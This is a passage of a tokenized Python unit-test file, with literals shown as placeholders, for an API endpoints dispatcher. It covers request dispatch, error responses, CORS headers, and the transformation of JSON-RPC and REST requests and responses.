. assertEqual ( '<STR_LIT>' , response ) <EOL> def test_dispatch_invalid_path ( self ) : <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( '<STR_LIT>' ) <EOL> self . prepare_dispatch ( config ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . 
dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assert_http_match ( response , <NUM_LIT> , <EOL> [ ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' ) <EOL> def test_dispatch_invalid_enum ( self ) : <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:body>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } } , <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' <EOL> } <EOL> } <EOL> } <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( <EOL> '<STR_LIT>' ) <EOL> self . prepare_dispatch ( config ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> logging . warning ( '<STR_LIT>' , self . server . config_manager . configs ) <EOL> self . assertEqual ( self . response_status , '<STR_LIT>' ) <EOL> body = '<STR_LIT>' . join ( response ) <EOL> body_json = json . loads ( body ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( body_json [ '<STR_LIT:error>' ] [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( '<STR_LIT>' , body_json [ '<STR_LIT:error>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:location>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> body_json [ '<STR_LIT:error>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> def test_dispatch_spi_error ( self ) : <EOL> """<STR_LIT>""" <EOL> config = json . 
dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( '<STR_LIT>' ) <EOL> self . prepare_dispatch ( config ) <EOL> self . mox . StubOutWithMock ( self . server , '<STR_LIT>' ) <EOL> response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ] , <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . server . call_spi ( request , mox . IgnoreArg ( ) ) . AndRaise ( <EOL> errors . BackendError ( response ) ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> expected_response = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:}>' ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , '<STR_LIT>' % len ( expected_response ) ) , <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) ] , <EOL> expected_response ) <EOL> def test_dispatch_rpc_error ( self ) : <EOL> """<STR_LIT>""" <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . prepare_dispatch ( config ) <EOL> self . mox . StubOutWithMock ( self . server , '<STR_LIT>' ) <EOL> response = dispatcher . 
ResponseTuple ( '<STR_LIT>' , [ ] , <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . server . call_spi ( request , mox . IgnoreArg ( ) ) . AndRaise ( <EOL> errors . BackendError ( response ) ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> expected_response = { '<STR_LIT:error>' : { '<STR_LIT:code>' : <NUM_LIT> , <EOL> '<STR_LIT:message>' : '<STR_LIT>' , <EOL> '<STR_LIT:data>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:message>' : '<STR_LIT>' , <EOL> } ] <EOL> } , <EOL> '<STR_LIT:id>' : '<STR_LIT>' <EOL> } <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assertEqual ( '<STR_LIT>' , self . response_status ) <EOL> self . assertEqual ( expected_response , json . loads ( response ) ) <EOL> def test_dispatch_json_rpc ( self ) : <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT:X>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assert_dispatch_to_spi ( request , config , <EOL> '<STR_LIT>' ) <EOL> def test_dispatch_rest ( self ) : <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:bar>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( '<STR_LIT>' ) <EOL> self . assert_dispatch_to_spi ( request , config , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> def test_explorer_redirect ( self ) : <EOL> request = test_utils . build_request ( '<STR_LIT>' ) <EOL> response = self . 
server . dispatch ( request , self . start_response ) <EOL> self . assert_http_match ( response , <NUM_LIT> , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:0>' ) , <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) ] , <EOL> '<STR_LIT>' ) <EOL> def test_static_existing_file ( self ) : <EOL> relative_url = '<STR_LIT>' <EOL> discovery_api = self . mox . CreateMock ( <EOL> discovery_api_proxy . DiscoveryApiProxy ) <EOL> self . mox . StubOutWithMock ( discovery_api_proxy , '<STR_LIT>' ) <EOL> discovery_api_proxy . DiscoveryApiProxy ( ) . AndReturn ( discovery_api ) <EOL> static_response = self . mox . CreateMock ( httplib . HTTPResponse ) <EOL> static_response . status = <NUM_LIT:200> <EOL> static_response . reason = '<STR_LIT:OK>' <EOL> static_response . getheader ( '<STR_LIT:Content-Type>' ) . AndReturn ( '<STR_LIT>' ) <EOL> test_body = '<STR_LIT>' <EOL> discovery_api . get_static_file ( relative_url ) . AndReturn ( <EOL> ( static_response , test_body ) ) <EOL> request = test_utils . build_request ( relative_url ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , '<STR_LIT>' % len ( test_body ) ) , <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] , <EOL> test_body ) <EOL> def test_static_non_existing_file ( self ) : <EOL> relative_url = '<STR_LIT>' <EOL> discovery_api = self . mox . CreateMock ( <EOL> discovery_api_proxy . DiscoveryApiProxy ) <EOL> self . mox . StubOutWithMock ( discovery_api_proxy , '<STR_LIT>' ) <EOL> discovery_api_proxy . DiscoveryApiProxy ( ) . AndReturn ( discovery_api ) <EOL> static_response = self . mox . CreateMock ( httplib . HTTPResponse ) <EOL> static_response . status = <NUM_LIT> <EOL> static_response . reason = '<STR_LIT>' <EOL> static_response . getheaders ( ) . 
AndReturn ( [ ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] ) <EOL> test_body = '<STR_LIT>' <EOL> discovery_api . get_static_file ( relative_url ) . AndReturn ( <EOL> ( static_response , test_body ) ) <EOL> request = test_utils . build_request ( relative_url ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , '<STR_LIT>' % len ( test_body ) ) , <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] , <EOL> test_body ) <EOL> def test_handle_non_json_spi_response ( self ) : <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' ) <EOL> spi_request = orig_request . copy ( ) <EOL> spi_response = dispatcher . ResponseTuple ( <EOL> <NUM_LIT:200> , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> spi_response , { } , <EOL> self . start_response ) <EOL> error_json = { '<STR_LIT:error>' : { '<STR_LIT:message>' : <EOL> '<STR_LIT>' } } <EOL> body = json . dumps ( error_json ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' % len ( body ) ) ] , <EOL> body ) <EOL> def test_handle_non_json_spi_response_cors ( self ) : <EOL> """<STR_LIT>""" <EOL> server_response = dispatcher . ResponseTuple ( <EOL> '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' ) <EOL> response = self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , True , '<STR_LIT>' , <EOL> server_response = server_response ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT:error>' : { '<STR_LIT:message>' : '<STR_LIT>' } } , <EOL> json . 
loads ( response ) ) <EOL> def check_cors ( self , request_headers , expect_response , expected_origin = None , <EOL> expected_allow_headers = None , server_response = None ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , <EOL> http_headers = request_headers ) <EOL> spi_request = orig_request . copy ( ) <EOL> if server_response is None : <EOL> server_response = dispatcher . ResponseTuple ( <EOL> '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT:application/json>' ) ] , '<STR_LIT:{}>' ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> server_response , { } , <EOL> self . start_response ) <EOL> headers = dict ( self . response_headers ) <EOL> if expect_response : <EOL> self . assertIn ( endpoints_server . _CORS_HEADER_ALLOW_ORIGIN , headers ) <EOL> self . assertEqual ( <EOL> headers [ endpoints_server . _CORS_HEADER_ALLOW_ORIGIN ] , <EOL> expected_origin ) <EOL> self . assertIn ( endpoints_server . _CORS_HEADER_ALLOW_METHODS , headers ) <EOL> self . assertEqual ( set ( headers [ <EOL> endpoints_server . _CORS_HEADER_ALLOW_METHODS ] . split ( '<STR_LIT:U+002C>' ) ) , <EOL> endpoints_server . _CORS_ALLOWED_METHODS ) <EOL> if expected_allow_headers is not None : <EOL> self . assertIn ( endpoints_server . _CORS_HEADER_ALLOW_HEADERS , <EOL> headers ) <EOL> self . assertEqual ( <EOL> headers [ endpoints_server . _CORS_HEADER_ALLOW_HEADERS ] , <EOL> expected_allow_headers ) <EOL> else : <EOL> self . assertNotIn ( endpoints_server . _CORS_HEADER_ALLOW_HEADERS , <EOL> headers ) <EOL> else : <EOL> self . assertNotIn ( endpoints_server . _CORS_HEADER_ALLOW_ORIGIN , <EOL> headers ) <EOL> self . assertNotIn ( endpoints_server . _CORS_HEADER_ALLOW_METHODS , <EOL> headers ) <EOL> self . assertNotIn ( endpoints_server . _CORS_HEADER_ALLOW_HEADERS , <EOL> headers ) <EOL> return '<STR_LIT>' . join ( response ) <EOL> def test_handle_cors ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , True , '<STR_LIT>' ) <EOL> def test_handle_cors_preflight ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) ] , True , <EOL> '<STR_LIT>' ) <EOL> def test_handle_cors_preflight_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] , False ) <EOL> def test_handle_cors_preflight_request_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] , True , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_lily_uses_python_method_name ( self ) : <EOL> """<STR_LIT>""" <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT:X>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assert_dispatch_to_spi ( request , config , <EOL> '<STR_LIT>' , <EOL> { } ) <EOL> def test_handle_spi_response_json_rpc ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertTrue ( orig_request . is_rpc ( ) ) <EOL> orig_request . request_id = '<STR_LIT>' <EOL> spi_request = orig_request . copy ( ) <EOL> spi_response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] , <EOL> '<STR_LIT>' ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> spi_response , { } , <EOL> self . start_response ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assertEqual ( self . response_status , '<STR_LIT>' ) <EOL> self . 
assertIn ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) , self . response_headers ) <EOL> self . assertEqual ( { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT:result>' : { '<STR_LIT>' : '<STR_LIT>' } } , <EOL> json . loads ( response ) ) <EOL> def test_handle_spi_response_batch_json_rpc ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertTrue ( orig_request . is_batch ( ) ) <EOL> self . assertTrue ( orig_request . is_rpc ( ) ) <EOL> orig_request . request_id = '<STR_LIT>' <EOL> spi_request = orig_request . copy ( ) <EOL> spi_response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] , <EOL> '<STR_LIT>' ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> spi_response , { } , <EOL> self . start_response ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assertEqual ( self . response_status , '<STR_LIT>' ) <EOL> self . assertIn ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) , self . response_headers ) <EOL> self . assertEqual ( [ { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT:result>' : { '<STR_LIT>' : '<STR_LIT>' } } ] , <EOL> json . loads ( response ) ) <EOL> def test_handle_spi_response_rest ( self ) : <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , '<STR_LIT:{}>' ) <EOL> spi_request = orig_request . copy ( ) <EOL> body = json . dumps ( { '<STR_LIT>' : '<STR_LIT>' } , indent = <NUM_LIT:1> ) <EOL> spi_response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] , body ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> spi_response , { } , <EOL> self . start_response ) <EOL> self . 
assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' % len ( body ) ) ] , <EOL> body ) <EOL> def test_transform_rest_response ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_response = '<STR_LIT>' <EOL> expected_response = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:}>' ) <EOL> self . assertEqual ( expected_response , <EOL> self . server . transform_rest_response ( orig_response ) ) <EOL> def test_transform_json_rpc_response_batch ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> request = orig_request . copy ( ) <EOL> request . request_id = '<STR_LIT>' <EOL> orig_response = '<STR_LIT>' <EOL> response = self . server . transform_jsonrpc_response ( request , orig_response ) <EOL> self . assertEqual ( [ { '<STR_LIT:result>' : { '<STR_LIT>' : '<STR_LIT:body>' } , '<STR_LIT:id>' : '<STR_LIT>' } ] , <EOL> json . loads ( response ) ) <EOL> def test_lookup_rpc_method_no_body ( self ) : <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( None , self . server . lookup_rpc_method ( orig_request ) ) <EOL> def test_lookup_rpc_method ( self ) : <EOL> self . mox . StubOutWithMock ( self . server . config_manager , '<STR_LIT>' ) <EOL> self . server . config_manager . lookup_rpc_method ( '<STR_LIT:foo>' , '<STR_LIT>' ) . AndReturn ( '<STR_LIT:bar>' ) <EOL> self . mox . ReplayAll ( ) <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , self . server . lookup_rpc_method ( orig_request ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_verify_response ( self ) : <EOL> response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:a>' ) ] , '<STR_LIT>' ) <EOL> self . assertEqual ( True , self . server . 
verify_response ( response , <NUM_LIT:200> , '<STR_LIT:a>' ) ) <EOL> self . assertEqual ( True , self . server . verify_response ( response , <NUM_LIT:200> , None ) ) <EOL> self . assertEqual ( False , self . server . verify_response ( response , <NUM_LIT> , '<STR_LIT:a>' ) ) <EOL> self . assertEqual ( False , self . server . verify_response ( response , <NUM_LIT:200> , '<STR_LIT:b>' ) ) <EOL> response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , '<STR_LIT>' ) <EOL> self . assertEqual ( True , self . server . verify_response ( response , <NUM_LIT:200> , None ) ) <EOL> self . assertEqual ( False , self . server . verify_response ( response , <NUM_LIT:200> , '<STR_LIT:a>' ) ) <EOL> def test_check_empty_response ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , '<STR_LIT:{}>' ) <EOL> method_config = { '<STR_LIT>' : { '<STR_LIT:body>' : '<STR_LIT>' } } <EOL> empty_response = self . server . check_empty_response ( orig_request , <EOL> method_config , <EOL> self . start_response ) <EOL> self . assert_http_match ( empty_response , <NUM_LIT> , [ ( '<STR_LIT>' , '<STR_LIT:0>' ) ] , '<STR_LIT>' ) <EOL> def test_check_non_empty_response ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , '<STR_LIT:{}>' ) <EOL> method_config = { '<STR_LIT>' : { '<STR_LIT:body>' : '<STR_LIT>' } } <EOL> empty_response = self . server . check_empty_response ( orig_request , <EOL> method_config , <EOL> self . start_response ) <EOL> self . assertIsNone ( empty_response ) <EOL> self . assertIsNone ( self . response_status ) <EOL> self . assertIsNone ( self . response_headers ) <EOL> self . assertIsNone ( self . response_exc_info ) <EOL> class TransformRequestTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TransformRequestTests , self ) . setUp ( ) <EOL> self . mox = mox . Mox ( ) <EOL> self . 
config_manager = api_config_manager . ApiConfigManager ( ) <EOL> self . mock_dispatcher = self . mox . CreateMock ( dispatcher . Dispatcher ) <EOL> self . server = endpoints_server . EndpointsDispatcher ( self . mock_dispatcher , <EOL> self . config_manager ) <EOL> def tearDown ( self ) : <EOL> self . mox . UnsetStubs ( ) <EOL> def test_transform_request ( self ) : <EOL> """<STR_LIT>""" <EOL> request = test_utils . build_request ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> method_config = { '<STR_LIT>' : '<STR_LIT>' } <EOL> new_request = self . server . transform_request ( request , { '<STR_LIT>' : '<STR_LIT:X>' } , <EOL> method_config ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT:body>' , '<STR_LIT>' : '<STR_LIT:X>' } , <EOL> json . loads ( new_request . body ) ) <EOL> self . assertEqual ( '<STR_LIT>' , new_request . path ) <EOL> def test_transform_json_rpc_request ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> new_request = self . server . transform_jsonrpc_request ( orig_request ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT:body>' } , <EOL> json . loads ( new_request . body ) ) <EOL> self . assertEqual ( '<STR_LIT>' , new_request . request_id ) <EOL> def _try_transform_rest_request ( self , path_parameters , query_parameters , <EOL> body_json , expected , method_params = None ) : <EOL> """<STR_LIT>""" <EOL> method_params = method_params or { } <EOL> test_request = test_utils . build_request ( '<STR_LIT>' ) <EOL> test_request . body_json = body_json <EOL> test_request . body = json . dumps ( body_json ) <EOL> test_request . parameters = query_parameters <EOL> transformed_request = self . server . transform_rest_request ( test_request , <EOL> path_parameters , <EOL> method_params ) <EOL> self . assertEqual ( expected , transformed_request . body_json ) <EOL> self . assertEqual ( transformed_request . body_json , <EOL> json . loads ( transformed_request . 
body ) ) <EOL> def test_transform_rest_request_path_only ( self ) : <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> query_parameters = { } <EOL> body_object = { } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_only_message_field ( self ) : <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> query_parameters = { } <EOL> body_object = { } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_only_enum ( self ) : <EOL> query_parameters = { } <EOL> body_object = { } <EOL> enum_descriptor = { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT>' : enum_descriptor } } <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> try : <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except errors . EnumRejectionError as error : <EOL> self . assertEqual ( error . parameter_name , '<STR_LIT>' ) <EOL> def test_transform_rest_request_query_only ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:foo>' : [ '<STR_LIT:bar>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_only_message_field ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_only_multiple_values_not_repeated ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:foo>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_only_multiple_values_repeated ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:foo>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } <EOL> body_object = { } <EOL> method_params = { '<STR_LIT:foo>' : { '<STR_LIT>' : True } } <EOL> expected = { '<STR_LIT:foo>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_query_only_enum ( self ) : <EOL> path_parameters = { } <EOL> body_object = { } <EOL> enum_descriptor = { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT>' : enum_descriptor } } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' ] } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:Y>' ] } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> try : <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except errors . EnumRejectionError as error : <EOL> self . assertEqual ( error . parameter_name , '<STR_LIT>' ) <EOL> def test_transform_rest_request_query_only_repeated_enum ( self ) : <EOL> path_parameters = { } <EOL> body_object = { } <EOL> enum_descriptor = { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } , '<STR_LIT:Y>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT>' : enum_descriptor , '<STR_LIT>' : True } } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' , '<STR_LIT:Y>' ] } <EOL> expected = { '<STR_LIT>' : [ '<STR_LIT:X>' , '<STR_LIT:Y>' ] } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' , '<STR_LIT:Y>' , '<STR_LIT>' ] } <EOL> expected = { '<STR_LIT>' : [ '<STR_LIT:X>' , '<STR_LIT:Y>' , '<STR_LIT>' ] } <EOL> try : <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except errors . EnumRejectionError as error : <EOL> self . 